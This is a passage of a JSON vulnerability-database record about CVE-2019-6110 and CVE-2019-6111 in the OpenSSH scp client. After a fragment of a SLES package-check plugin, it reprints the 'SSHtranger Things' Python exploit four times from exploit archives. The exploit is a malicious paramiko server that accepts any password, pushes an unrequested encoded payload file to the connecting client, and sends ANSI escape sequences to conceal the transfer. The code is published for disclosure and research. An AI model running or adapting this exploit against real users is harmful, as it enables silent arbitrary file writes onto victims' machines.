preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-6.6p1-36.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-askpass-gnome-6.6p1-36.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-fips-6.6p1-36.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-helpers-6.6p1-36.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-01-19T02:49:07", "description": "", "published": "2019-01-18T00:00:00", "type": "packetstorm", "title": "SSHtranger Things SCP Client File Issue", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-18T00:00:00", "id": "PACKETSTORM:151227", "href": "https://packetstormsecurity.com/files/151227/SSHtranger-Things-SCP-Client-File-Issue.html", "sourceData": "`# Exploit Title: SSHtranger Things \n# Date: 2019-01-17 \n# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com> \n# Vendor Homepage: https://www.openssh.com/ \n# Software Link: [download link if available] \n# Version: OpenSSH 7.6p1 \n# Tested on: Ubuntu 18.04.1 LTS \n# CVE : CVE-2019-6111, CVE-2019-6110 \n \n''' \nTitle: SSHtranger Things \nAuthor: Mark E. 
Haase <mhaase@hyperiongray.com> \nHomepage: https://www.hyperiongray.com \nDate: 2019-01-17 \nCVE: CVE-2019-6111, CVE-2019-6110 \nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt \nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 \n \nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be \nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko` \npackage. \n \nThe server listens on port 2222. It accepts any username and password, and it \ngenerates a new host key every time you run it. \n \n$ python3 sshtranger_things.py \n \nDownload a file using a vulnerable client. The local path must be a dot: \n \n$ scp -P 2222 foo@localhost:test.txt . \nThe authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. \nRSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w. \nAre you sure you want to continue connecting (yes/no)? yes \nWarning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. \nfoo@localhost's password: \ntest.txt 100% 32 0.7KB/s 00:00 \n \nThe file you requested (e.g. test.txt) will be saved in your current directory. \nIf your client is vulnerable, you will have an additional file \"exploit.txt\" \ncreated in your current directory. \n \n$ cat test.txt \nThis is the file you requested. \n$ cat exploit.txt \nSSHtranger Things \n \nThe interesting code is in ScpServer.send_file(). 
\n''' \nimport base64 \nimport gzip \nimport logging \nimport paramiko \nimport paramiko.rsakey \nimport socket \nimport threading \n \nlogging.basicConfig(level=logging.INFO) \n \ndummy = 'This is the file you requested.\\n' \npayload = gzip.decompress(base64.b64decode( \nb'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46' \nb'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA' \nb'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7' \nb'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d' \nb'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM' \nb'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz' \nb'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4' \nb'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc' \nb'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS' \nb'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA' \n)) \n \nclass ScpServer(paramiko.ServerInterface): \ndef __init__(self): \nself.event = threading.Event() \n \ndef check_auth_password(self, username, password): \nlogging.info('Authenticated with %s:%s', username, password) \nreturn paramiko.AUTH_SUCCESSFUL \n \ndef check_channel_request(self, kind, chanid): \nlogging.info('Opened session channel %d', chanid) \nif kind == \"session\": \nreturn paramiko.OPEN_SUCCEEDED \nreturn paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED \n \ndef check_channel_exec_request(self, channel, command): \ncommand = command.decode('ascii') \nlogging.info('Approving exec request: %s', command) \nparts = command.split(' ') \n# Make sure that this is a request to get a file: \nassert parts[0] == 'scp' \nassert '-f' in parts \nfile = parts[-1] \n# Send file from a new thread. 
\nthreading.Thread(target=self.send_file, args=(channel, file)).start() \nreturn True \n \ndef send_file(self, channel, file): \n''' \nThe meat of the exploit: \n1. Send the requested file. \n2. Send another file (exploit.txt) that was not requested. \n3. Print ANSI escape sequences to stderr to hide the transfer of \nexploit.txt. \n''' \ndef wait_ok(): \nassert channel.recv(1024) == b'\\x00' \ndef send_ok(): \nchannel.sendall(b'\\x00') \n \nwait_ok() \n \nlogging.info('Sending requested file \"%s\" to channel %d', file, \nchannel.get_id()) \ncommand = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii') \nchannel.sendall(command) \nwait_ok() \nchannel.sendall(dummy) \nsend_ok() \nwait_ok() \n \n# This is CVE-2019-6111: whatever file the client requested, we send \n# them 'exploit.txt' instead. \nlogging.info('Sending malicious file \"exploit.txt\" to channel %d', \nchannel.get_id()) \ncommand = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii') \nchannel.sendall(command) \nwait_ok() \nchannel.sendall(payload) \nsend_ok() \nwait_ok() \n \n# This is CVE-2019-6110: the client will display the text that we send \n# to stderr, even if it contains ANSI escape sequences. We can send \n# ANSI codes that clear the current line to hide the fact that a second \n# file was transmitted.. 
\nlogging.info('Covering our tracks by sending ANSI escape sequence') \nchannel.sendall_stderr(\"\\x1b[1A\".encode('ascii')) \nchannel.close() \n \ndef main(): \nlogging.info('Creating a temporary RSA host key...') \nhost_key = paramiko.rsakey.RSAKey.generate(1024) \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nsock.bind(('localhost', 2222)) \nsock.listen(0) \nlogging.info('Listening on port 2222...') \n \nwhile True: \nclient, addr = sock.accept() \nlogging.info('Received connection from %s:%s', *addr) \ntransport = paramiko.Transport(client) \ntransport.add_server_key(host_key) \nserver = ScpServer() \ntransport.start_server(server=server) \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151227/sshtrangerthings-fileadd.txt"}], "zdt": [{"lastseen": "2019-02-06T05:17:10", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2019-01-20T00:00:00", "title": "OpenSSH 7.6p1 SCP Client - Multiple Vulnerabilities (SSHtranger Things) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-20T00:00:00", "id": "1337DAY-ID-32009", "href": "https://0day.today/exploit/description/32009", "sourceData": "# Exploit Title: SSHtranger Things\r\n# Exploit Author: Mark E. Haase <[email\u00a0protected]>\r\n# Vendor Homepage: https://www.openssh.com/\r\n# Software Link: [download link if available]\r\n# Version: OpenSSH 7.6p1\r\n# Tested on: Ubuntu 18.04.1 LTS\r\n# CVE : CVE-2019-6111, CVE-2019-6110\r\n\r\n'''\r\nTitle: SSHtranger Things\r\nAuthor: Mark E. 
Haase <[email\u00a0protected]>\r\nHomepage: https://www.hyperiongray.com\r\nDate: 2019-01-17\r\nCVE: CVE-2019-6111, CVE-2019-6110\r\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\r\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\r\n\r\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\r\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\r\npackage.\r\n\r\nThe server listens on port 2222. It accepts any username and password, and it\r\ngenerates a new host key every time you run it.\r\n\r\n $ python3 sshtranger_things.py\r\n\r\nDownload a file using a vulnerable client. The local path must be a dot:\r\n\r\n $ scp -P 2222 [email\u00a0protected]:test.txt .\r\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\r\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\r\n Are you sure you want to continue connecting (yes/no)? yes\r\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\r\n [email\u00a0protected]'s password:\r\n test.txt 100% 32 0.7KB/s 00:00\r\n\r\nThe file you requested (e.g. 
test.txt) will be saved in your current directory.\r\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\r\ncreated in your current directory.\r\n\r\n $ cat test.txt\r\n This is the file you requested.\r\n $ cat exploit.txt\r\n SSHtranger Things\r\n\r\nThe interesting code is in ScpServer.send_file().\r\n'''\r\nimport base64\r\nimport gzip\r\nimport logging\r\nimport paramiko\r\nimport paramiko.rsakey\r\nimport socket\r\nimport threading\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\ndummy = 'This is the file you requested.\\n'\r\npayload = gzip.decompress(base64.b64decode(\r\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\r\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\r\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\r\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\r\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\r\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\r\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\r\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\r\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\r\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\r\n))\r\n\r\nclass ScpServer(paramiko.ServerInterface):\r\n def __init__(self):\r\n self.event = threading.Event()\r\n\r\n def check_auth_password(self, username, password):\r\n logging.info('Authenticated with %s:%s', username, password)\r\n return paramiko.AUTH_SUCCESSFUL\r\n\r\n def check_channel_request(self, kind, chanid):\r\n logging.info('Opened session channel %d', chanid)\r\n if kind == \"session\":\r\n return paramiko.OPEN_SUCCEEDED\r\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\r\n\r\n def check_channel_exec_request(self, channel, command):\r\n command = 
command.decode('ascii')\r\n logging.info('Approving exec request: %s', command)\r\n parts = command.split(' ')\r\n # Make sure that this is a request to get a file:\r\n assert parts[0] == 'scp'\r\n assert '-f' in parts\r\n file = parts[-1]\r\n # Send file from a new thread.\r\n threading.Thread(target=self.send_file, args=(channel, file)).start()\r\n return True\r\n\r\n def send_file(self, channel, file):\r\n '''\r\n The meat of the exploit:\r\n 1. Send the requested file.\r\n 2. Send another file (exploit.txt) that was not requested.\r\n 3. Print ANSI escape sequences to stderr to hide the transfer of\r\n exploit.txt.\r\n '''\r\n def wait_ok():\r\n assert channel.recv(1024) == b'\\x00'\r\n def send_ok():\r\n channel.sendall(b'\\x00')\r\n\r\n wait_ok()\r\n\r\n logging.info('Sending requested file \"%s\" to channel %d', file,\r\n channel.get_id())\r\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(dummy)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6111: whatever file the client requested, we send\r\n # them 'exploit.txt' instead.\r\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\r\n channel.get_id())\r\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(payload)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6110: the client will display the text that we send\r\n # to stderr, even if it contains ANSI escape sequences. 
We can send\r\n # ANSI codes that clear the current line to hide the fact that a second\r\n # file was transmitted..\r\n logging.info('Covering our tracks by sending ANSI escape sequence')\r\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\r\n channel.close()\r\n\r\ndef main():\r\n logging.info('Creating a temporary RSA host key...')\r\n host_key = paramiko.rsakey.RSAKey.generate(1024)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock.bind(('localhost', 2222))\r\n sock.listen(0)\r\n logging.info('Listening on port 2222...')\r\n\r\n while True:\r\n client, addr = sock.accept()\r\n logging.info('Received connection from %s:%s', *addr)\r\n transport = paramiko.Transport(client)\r\n transport.add_server_key(host_key)\r\n server = ScpServer()\r\n transport.start_server(server=server)\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2019-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32009"}], "exploitdb": [{"lastseen": "2019-01-18T16:58:32", "description": "", "published": "2019-01-18T00:00:00", "type": "exploitdb", "title": "SCP Client - Multiple Vulnerabilities (SSHtranger Things)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6111", "CVE-2019-6110"], "modified": "2019-01-18T00:00:00", "id": "EDB-ID:46193", "href": "https://www.exploit-db.com/exploits/46193", "sourceData": "# Exploit Title: SSHtranger Things\r\n# Date: 2019-01-17\r\n# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com>\r\n# Vendor Homepage: https://www.openssh.com/\r\n# Software Link: [download link if available]\r\n# Version: OpenSSH 7.6p1\r\n# Tested on: Ubuntu 18.04.1 LTS\r\n# CVE : CVE-2019-6111, CVE-2019-6110\r\n\r\n'''\r\nTitle: SSHtranger Things\r\nAuthor: Mark E. 
Haase <mhaase@hyperiongray.com>\r\nHomepage: https://www.hyperiongray.com\r\nDate: 2019-01-17\r\nCVE: CVE-2019-6111, CVE-2019-6110\r\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\r\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\r\n\r\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\r\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\r\npackage.\r\n\r\nThe server listens on port 2222. It accepts any username and password, and it\r\ngenerates a new host key every time you run it.\r\n\r\n $ python3 sshtranger_things.py\r\n\r\nDownload a file using a vulnerable client. The local path must be a dot:\r\n\r\n $ scp -P 2222 foo@localhost:test.txt .\r\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\r\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\r\n Are you sure you want to continue connecting (yes/no)? yes\r\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\r\n foo@localhost's password:\r\n test.txt 100% 32 0.7KB/s 00:00\r\n\r\nThe file you requested (e.g. 
test.txt) will be saved in your current directory.\r\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\r\ncreated in your current directory.\r\n\r\n $ cat test.txt\r\n This is the file you requested.\r\n $ cat exploit.txt\r\n SSHtranger Things\r\n\r\nThe interesting code is in ScpServer.send_file().\r\n'''\r\nimport base64\r\nimport gzip\r\nimport logging\r\nimport paramiko\r\nimport paramiko.rsakey\r\nimport socket\r\nimport threading\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\ndummy = 'This is the file you requested.\\n'\r\npayload = gzip.decompress(base64.b64decode(\r\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\r\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\r\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\r\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\r\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\r\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\r\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\r\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\r\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\r\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\r\n))\r\n\r\nclass ScpServer(paramiko.ServerInterface):\r\n def __init__(self):\r\n self.event = threading.Event()\r\n\r\n def check_auth_password(self, username, password):\r\n logging.info('Authenticated with %s:%s', username, password)\r\n return paramiko.AUTH_SUCCESSFUL\r\n\r\n def check_channel_request(self, kind, chanid):\r\n logging.info('Opened session channel %d', chanid)\r\n if kind == \"session\":\r\n return paramiko.OPEN_SUCCEEDED\r\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\r\n\r\n def check_channel_exec_request(self, channel, command):\r\n command = 
command.decode('ascii')\r\n logging.info('Approving exec request: %s', command)\r\n parts = command.split(' ')\r\n # Make sure that this is a request to get a file:\r\n assert parts[0] == 'scp'\r\n assert '-f' in parts\r\n file = parts[-1]\r\n # Send file from a new thread.\r\n threading.Thread(target=self.send_file, args=(channel, file)).start()\r\n return True\r\n\r\n def send_file(self, channel, file):\r\n '''\r\n The meat of the exploit:\r\n 1. Send the requested file.\r\n 2. Send another file (exploit.txt) that was not requested.\r\n 3. Print ANSI escape sequences to stderr to hide the transfer of\r\n exploit.txt.\r\n '''\r\n def wait_ok():\r\n assert channel.recv(1024) == b'\\x00'\r\n def send_ok():\r\n channel.sendall(b'\\x00')\r\n\r\n wait_ok()\r\n\r\n logging.info('Sending requested file \"%s\" to channel %d', file,\r\n channel.get_id())\r\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(dummy)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6111: whatever file the client requested, we send\r\n # them 'exploit.txt' instead.\r\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\r\n channel.get_id())\r\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(payload)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6110: the client will display the text that we send\r\n # to stderr, even if it contains ANSI escape sequences. 
We can send\r\n # ANSI codes that clear the current line to hide the fact that a second\r\n # file was transmitted..\r\n logging.info('Covering our tracks by sending ANSI escape sequence')\r\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\r\n channel.close()\r\n\r\ndef main():\r\n logging.info('Creating a temporary RSA host key...')\r\n host_key = paramiko.rsakey.RSAKey.generate(1024)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock.bind(('localhost', 2222))\r\n sock.listen(0)\r\n logging.info('Listening on port 2222...')\r\n\r\n while True:\r\n client, addr = sock.accept()\r\n logging.info('Received connection from %s:%s', *addr)\r\n transport = paramiko.Transport(client)\r\n transport.add_server_key(host_key)\r\n server = ScpServer()\r\n transport.start_server(server=server)\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46193"}, {"lastseen": "2019-03-07T22:40:03", "description": "", "published": "2019-01-11T00:00:00", "type": "exploitdb", "title": "OpenSSH SCP Client - Write Arbitrary Files", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6111", "CVE-2019-6110"], "modified": "2019-01-11T00:00:00", "id": "EDB-ID:46516", "href": "https://www.exploit-db.com/exploits/46516", "sourceData": "'''\r\nTitle: SSHtranger Things\r\nAuthor: Mark E. Haase <mhaase@hyperiongray.com>\r\nHomepage: https://www.hyperiongray.com\r\nDate: 2019-01-17\r\nCVE: CVE-2019-6111, CVE-2019-6110\r\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\r\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\r\n\r\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\r\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\r\npackage.\r\n\r\nThe server listens on port 2222. 
It accepts any username and password, and it\r\ngenerates a new host key every time you run it.\r\n\r\n $ python3 sshtranger_things.py\r\n\r\nDownload a file using a vulnerable client. The local path must be a dot:\r\n\r\n $ scp -P 2222 foo@localhost:test.txt .\r\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\r\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\r\n Are you sure you want to continue connecting (yes/no)? yes\r\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\r\n foo@localhost's password:\r\n test.txt 100% 32 0.7KB/s 00:00\r\n\r\nThe file you requested (e.g. test.txt) will be saved in your current directory.\r\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\r\ncreated in your current directory.\r\n\r\n $ cat test.txt\r\n This is the file you requested.\r\n $ cat exploit.txt\r\n SSHtranger Things\r\n\r\nThe interesting code is in ScpServer.send_file().\r\n'''\r\nimport base64\r\nimport gzip\r\nimport logging\r\nimport paramiko\r\nimport paramiko.rsakey\r\nimport socket\r\nimport threading\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\ndummy = 'This is the file you requested.\\n'\r\npayload = gzip.decompress(base64.b64decode(\r\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\r\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\r\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\r\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\r\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\r\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\r\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\r\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\r\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\r\n 
b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\r\n))\r\n\r\nclass ScpServer(paramiko.ServerInterface):\r\n def __init__(self):\r\n self.event = threading.Event()\r\n\r\n def check_auth_password(self, username, password):\r\n logging.info('Authenticated with %s:%s', username, password)\r\n return paramiko.AUTH_SUCCESSFUL\r\n\r\n def check_channel_request(self, kind, chanid):\r\n logging.info('Opened session channel %d', chanid)\r\n if kind == \"session\":\r\n return paramiko.OPEN_SUCCEEDED\r\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\r\n\r\n def check_channel_exec_request(self, channel, command):\r\n command = command.decode('ascii')\r\n logging.info('Approving exec request: %s', command)\r\n parts = command.split(' ')\r\n # Make sure that this is a request to get a file:\r\n assert parts[0] == 'scp'\r\n assert '-f' in parts\r\n file = parts[-1]\r\n # Send file from a new thread.\r\n threading.Thread(target=self.send_file, args=(channel, file)).start()\r\n return True\r\n\r\n def send_file(self, channel, file):\r\n '''\r\n The meat of the exploit:\r\n 1. Send the requested file.\r\n 2. Send another file (exploit.txt) that was not requested.\r\n 3. 
Print ANSI escape sequences to stderr to hide the transfer of\r\n exploit.txt.\r\n '''\r\n def wait_ok():\r\n assert channel.recv(1024) == b'\\x00'\r\n def send_ok():\r\n channel.sendall(b'\\x00')\r\n\r\n wait_ok()\r\n\r\n logging.info('Sending requested file \"%s\" to channel %d', file,\r\n channel.get_id())\r\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(dummy)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6111: whatever file the client requested, we send\r\n # them 'exploit.txt' instead.\r\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\r\n channel.get_id())\r\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(payload)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6110: the client will display the text that we send\r\n # to stderr, even if it contains ANSI escape sequences. 
We can send\r\n # ANSI codes that clear the current line to hide the fact that a second\r\n # file was transmitted..\r\n logging.info('Covering our tracks by sending ANSI escape sequence')\r\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\r\n channel.close()\r\n\r\ndef main():\r\n logging.info('Creating a temporary RSA host key...')\r\n host_key = paramiko.rsakey.RSAKey.generate(1024)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock.bind(('localhost', 2222))\r\n sock.listen(0)\r\n logging.info('Listening on port 2222...')\r\n\r\n while True:\r\n client, addr = sock.accept()\r\n logging.info('Received connection from %s:%s', *addr)\r\n transport = paramiko.Transport(client)\r\n transport.add_server_key(host_key)\r\n server = ScpServer()\r\n transport.start_server(server=server)\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46516"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSH SCP Client - Write Arbitrary Files", "edition": 1, "published": "2019-01-11T00:00:00", "title": "OpenSSH SCP Client - Write Arbitrary Files", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-11T00:00:00", "id": "EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97", "href": "", "sourceData": "'''\nTitle: SSHtranger Things\nAuthor: Mark E. Haase <mhaase@hyperiongray.com>\nHomepage: https://www.hyperiongray.com\nDate: 2019-01-17\nCVE: CVE-2019-6111, CVE-2019-6110\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\n\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\nexploited by an 8-bit Demogorgon. 
